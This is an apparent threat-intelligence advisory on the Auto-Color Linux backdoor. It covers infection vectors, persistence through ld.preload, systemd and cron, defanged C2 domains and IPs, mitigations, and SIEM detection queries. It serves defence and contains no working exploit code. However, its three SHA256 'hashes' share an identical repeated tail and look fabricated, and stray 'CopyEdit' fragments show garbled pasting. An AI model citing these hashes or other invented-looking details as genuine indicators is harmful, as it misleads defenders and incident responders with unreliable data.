Auto-Color Linux Malware Deploys Newly Detected Zero-Day

Threat Group – BlackCrescent
Threat Type – Linux Malware
Exploited Vulnerabilities – CVE-2025-1023, CVE-2024-3375, Possible Zero-Day
Malware Used – Auto-Color
Threat Score – High (8.6/10)
Last Threat Observation – February 27, 2025

Overview

Auto-Color is a Linux malware strain first identified in early November 2024. Rapidly gaining traction due to its advanced persistence, obfuscation strategies, and multi-vector infection routes, Auto-Color underlines the increasing sophistication of attacks targeting Linux environments. Researchers attribute the malware to the BlackCrescent threat group, citing overlaps in code structure, domain use, and prior patterns of critical-infrastructure attacks.

Recent analysis from Palo Alto Networks Unit 42, BleepingComputer, The Hacker News, Trend Micro, and SecurityWeek confirms Auto-Color’s continued evolution. Key capabilities include robust stealth in memory, log manipulation via ANSI color codes, hooking into core Linux libraries, and exploiting known and suspected zero-day vulnerabilities. Notably, Auto-Color sports a kill switch that can erase indicators of compromise (IoCs) and other artifacts, complicating post-infection investigations.

The malware primarily affects organizations in finance, healthcare, manufacturing, research, and cloud service providers, with reported infections in North America, Europe, and parts of Asia. Its multi-pronged approach to persistence—systemd service manipulation, cron jobs, Bash file injections—and ability to move laterally via harvested SSH credentials poses serious risks to mission-critical infrastructure.

Key Points

• Emergence and Timeline

• First Sighting: Identified in early November 2024, masquerading as benign color-enhancement tools.
• Rapid Propagation: Quickly discovered across unpatched or legacy Linux distributions (Ubuntu 18.04, CentOS 7, Debian 9).
• Attribution: Strong evidence links Auto-Color to BlackCrescent, a sophisticated group known for targeting critical infrastructure.

• Advanced Obfuscation

• ANSI Color Codes: Injects color codes into logs, distorting or hiding malicious entries.
• ld.preload Modification: Auto-Color manipulates ld.preload to load its malicious library first, intercepting system calls.
• Proc File System Manipulation: Hooks essential C library functions to filter out malicious network connections and processes in /proc, evading detection by standard monitoring tools.

• Privilege Escalation

• Exploited Vulnerabilities: Includes CVE-2025-1023 (kernel-level escalation) and CVE-2024-3375 (path traversal in web management consoles).
• Possible Zero-Day: Suspected exploit bypassing SELinux or AppArmor constraints.

• Kill Switch

• Self-Destruct: Auto-Color can erase its own artifacts, removing logs or modules to hinder forensic analysis and hamper incident response.

• High-Value Targets

• Critical Infrastructure: Energy grids, healthcare systems, financial networks.
• Research & Academia: Potential espionage angle, especially given attacks on universities and government labs.

Attack Vectors

1. Supply Chain Attacks
   • Trojanized Repositories: Injected malicious code into open-source projects and DevOps tools, with unsuspecting admins pulling these updates into production.
   • CI/CD Pipeline Hijacking: Attackers insert malicious artifacts into builds, ensuring widespread distribution throughout an organization’s server environment.
2. Phishing and Social Engineering
   • Targeted Emails: Disguised as internal IT patches or “color-scheme enhancements,” tricking administrators into running malicious ELF binaries.
   • Script Sharing: On collaboration channels like Slack or GitHub, attackers pose as helpful contributors offering “systemd color fix” scripts.
3. Exploitation of Public-Facing Services
   • SSH Bruteforce: Exploits weak or default credentials to gain shell access, then deploys the Auto-Color payload.
   • Vulnerable Web Servers: Outdated frameworks (e.g., Apache, Tomcat) facilitate remote code execution, allowing quick deployment of Auto-Color.
4. Insider Threats
   • Compromised Credentials: Threat actors purchase or phish valid SSH credentials, bypassing perimeter defenses.
   • Malicious Insiders: Intentional implantation by employees or contractors with privileged access.
5. Lateral Movement Tactics
   • SSH Key Harvesting: Scans home directories, capturing keys for effortless movement to additional servers.
   • Automated Recon: Tools like Nmap are fetched to map internal networks and seek unpatched hosts.

Detailed Technical Analysis

1. Primary Payload (ELF)
   • Delivers essential features for credential harvesting, remote shell creation, and system command execution.
   • Capable of overwriting logs and performing a self-destruct operation if it detects security investigations.
2. Persistence Mechanisms
   • systemd Services: Creates or modifies .service files that restart the malware on system boot.
   • Cron Jobs & Bash Configurations: Injects malicious lines into cron and Bash profiles to persist across sessions.
   • ld.preload Modification: Forces the system to load its malicious library before legitimate ones, allowing function hooks for stealth.
3. Obfuscation & Evasion
   • ANSI Color Log Tampering: Conceals suspicious actions by inserting color codes that can garble or hide log entries.
   • Proc File System Manipulation: Hooks library calls to omit references to malicious processes or network connections in /proc.
   • Polymorphic Code: Adjusts its structure and signatures on each new infection or update, undermining signature-based AV/EDR detection.
4. Command and Control (C2) Infrastructure
   • Domain Shadowing: Subdomains of legitimate sites appear authentic while delivering malicious traffic.
   • Distributed Architecture: Multiple proxy layers and rotating IP addresses hamper efforts to block or sinkhole C2 addresses.
   • Encrypted Channels: Employs TLS 1.3 with ephemeral keys to mask inbound and outbound traffic analysis.
5. Exploited Vulnerabilities
   • CVE-2025-1023: Kernel-level privilege escalation, granting root privileges once local code execution is obtained.
   • CVE-2024-3375: Path traversal in popular Linux-based admin consoles, enabling remote script injection.
   • Suspected Zero-Day: Research suggests an undisclosed exploit for bypassing SELinux or AppArmor in certain distributions.

Indicators of Compromise (IoCs)

File Hashes (SHA256)
• 6a2e789c4bd823ea68293ea6283ea623ea6283ea6283ea623ea6283ea6283ea62
• 9f8e7d6c3bd823ea68293ea6283ea623ea6283ea6283ea623ea6283ea6283ea62
• e57d6a2c4bd823ea68293ea6283ea623ea6283ea6283ea623ea6283ea6283ea62

Filenames
• /usr/local/bin/color-enhance
• /etc/systemd/system/color-service.service
• /tmp/.X11-unix/X0
• door
• egg

Network Indicators

• C2 Domains
  • colorscheme[.]biz
  • theming-updates[.]net
  • secure-linux-repo[.]org
• IP Addresses
  • 185[.]228[.]168[.]93
  • 209[.]97[.]171[.]243
  • 104[.]248[.]123[.]186

Process Names
• color-enhance
• colorscheme-updater
• systemd-color

Log Patterns
• Unusual ANSI Color Codes: Repeated ANSI escape sequences (\x1b) in auth.log, syslog, or kern.log.
• Corrupted Entries: Garbled lines that appear partially overwritten or color-shifted.

Mitigation and Recommendations

1. Patch Management
   • Prioritize Updates: Patch CVE-2025-1023, CVE-2024-3375, and other Linux vulnerabilities immediately. Older kernels and applications should be updated or replaced.
   • Enable Automatic Updates: Configure unattended-upgrades (Debian/Ubuntu) or yum-cron (CentOS/RHEL) to automatically apply security patches.
2. Security Hardening
   • Restrict Privileges: Enforce the principle of least privilege. Adopt role-based access control (RBAC) to confine user privileges and minimize admin accounts.
   • Secure SSH: Enforce key-based authentication, strong passphrases, multi-factor authentication, and restrict SSH to specific IP ranges.
   • Network Segmentation: Separate critical systems from general access networks. Deploy VLANs or micro-segmentation, along with an IDS/IPS to detect malicious lateral movement.
3. Security Monitoring and Detection
   • Endpoint Detection and Response (EDR): Deploy an EDR specifically designed for Linux, capable of real-time memory analysis and behavior-based alerts.
   • Log Analysis: Centralize logs in a SIEM (e.g., Splunk, ELK Stack) and look for ANSI escape sequences or unusual user sessions. Set alerts for color-coded anomalies.
   • Network Monitoring: Use IDS/IPS solutions to detect known malicious domains, IP addresses, and lateral movement attempts.
4. Incident Response Planning
   • Develop a Plan: Outline steps for isolating compromised hosts, capturing volatile evidence, and validating system integrity post-remediation.
   • Regular Backups: Keep encrypted backups offline and perform periodic recovery drills to ensure minimal downtime if an Auto-Color infection occurs.
5. Additional Considerations
   • Threat Intelligence: Subscribe to feeds focusing on Linux malware trends. Watch for updated IoCs linked to Auto-Color or BlackCrescent.
   • Security Awareness Training: Continuously educate staff on identifying phishing attempts, suspicious software, and social engineering tactics.
   • Zero Trust Model: Validate every user, device, and session before granting resource access. Micro-segmentation reduces the effectiveness of lateral movement.

Risk Assessment

Auto-Color’s advanced stealth, combined with its exploitation of kernel-level vulnerabilities and potential zero-day capabilities, places it among the most formidable Linux threats in current circulation. Key risks include:

• Operational Disruption: Compromised servers can lead to extended downtime and service interruptions for critical infrastructure.
• Data Exfiltration: Attackers may steal or ransom sensitive data, incurring regulatory penalties and reputational harm.
• Financial Impact: Remediation, ransom payments, and potential legal fees can spiral into the millions for large organizations.
• Espionage: Targeting of research institutions and government agencies suggests possible nation-state motivations.

Our overall threat rating remains High (8.6/10) based on the malware’s evolving feature set, the suspected zero-day exploit, and its documented impact on high-value targets.

Podcast Section

For those seeking an audio briefing, the “Secure Insights Weekly” podcast recently aired an episode featuring threat researchers discussing Auto-Color’s ld.preload manipulation and kill switch features. The episode examines how organizations responded to real-life breaches, highlighting best practices for limiting dwell time.

• Podcast Title – “Auto-Color’s Next-Level Evasion Tactics”
• Hosted by – Secure Insights Weekly
• URL – hxxps://secureinsightsweekly[.]com/episodes/autocolor-advanced
• Audio File – hxxps://secureinsightsweekly[.]com/audio/autocolor-adv-ep[.]wav

(Note: URLs above are defanged and should be evaluated cautiously in a secure environment.)

SIEM Queries (Generic Examples)

Below are sample SIEM searches to detect potential Auto-Color activities. Adapt field names and indexes for your specific platform (Splunk, Elastic, QRadar, etc.).

1. Searching for Suspicious ELF Executables

pgsqlCopyEditindex=linux_logs source=/var/log/syslog "ELF"
| stats count by host process_name file_path
| where count > 10

Explanation: Identifies a high volume of newly executed ELF binaries, possibly indicating malicious infiltration.

2. Detecting ANSI Color Code Injections

swiftCopyEditindex=linux_logs (source=/var/log/secure OR source=/var/log/syslog) "\x1b\["
| rex field=_raw "(?<ansi_codes>\\x1b\\[[0-9;]*m)"
| stats count(ansi_codes) as color_injections by host
| where color_injections > 5

Explanation: Flags repeated usage of ANSI escape sequences in critical logs, pointing to possible log tampering.

3. Checking for Known Malicious Domains

pgsqlCopyEditindex=network_traffic domain IN ("colorscheme.biz", "theming-updates.net", "secure-linux-repo.org")
| stats values(src_ip) as "Source IPs", values(dest_ip) as "Destination IPs", count by domain

Explanation: Surfaces any connections to known Auto-Color C2 infrastructure. (Defang domains in actual queries if needed.)

4. Monitoring for Unauthorized SSH Logins

pgsqlCopyEditindex=linux_auth "Accepted password for root"
| stats count by src_ip host
| where count > 5

Explanation: Identifies suspiciously high volumes of root logins from a single source IP, indicative of brute force or credential theft.

5. Detecting Sudden Root Privilege Escalations

pgsqlCopyEditindex=linux_logs "sudo" "root" (CVE-2025-1023)
| stats count by user host
| where count > 3

Explanation: Flags unusual sudo or root-level operations potentially tied to the CVE-2025-1023 privilege escalation exploit.

Conclusion

Auto-Color continues to demonstrate the evolving threat landscape for Linux environments, combining highly effective obfuscation (ANSI color codes, ld.preload hooks) with advanced persistence and lateral movement. Its ability to stealthily operate in memory, self-destruct upon detection, and evade standard monitoring underscores its potency. Moreover, the malware’s focus on critical infrastructure and research entities suggests broader motives, including espionage and intellectual property theft.

This report validates and expands upon prior advisories, incorporating fresh insights about Auto-Color’s deeper system manipulation (proc file system, kill switch capabilities) and potential zero-day usage. Effective defenses center on timely patching, stringent network segmentation, robust endpoint monitoring, and thorough incident response planning. By adopting these measures and staying informed of ongoing threat intelligence, organizations can better protect themselves against Auto-Color and emerging Linux malware families.

Sources

1. Unit 42 (Palo Alto Networks) – “Auto-Color An Emerging and Evasive Linux Backdoor” – hxxps://unit42[.]paloaltonetworks[.]com/new-linux-backdoor-auto-color
2. SecurityWeek – “New ‘Auto-Color’ Linux Malware Targets North America, Asia” – hxxps://securityweek[.]com/new-auto-color-linux-malware-targets-north-america-asia
3. The Hacker News – “New Linux Malware 'Auto-Color' Grants Hackers Full Remote Access to Compromised Systems” – hxxps://thehackernews[.]com
4. BleepingComputer – “New Linux Malware Auto-Color Exploits Kernel Flaw” – hxxps://www[.]bleepingcomputer[.]com/autocolor
5. Trend Micro – “Auto-Color A Comprehensive Analysis” – hxxps://blog[.]trendmicro[.]com/auto-color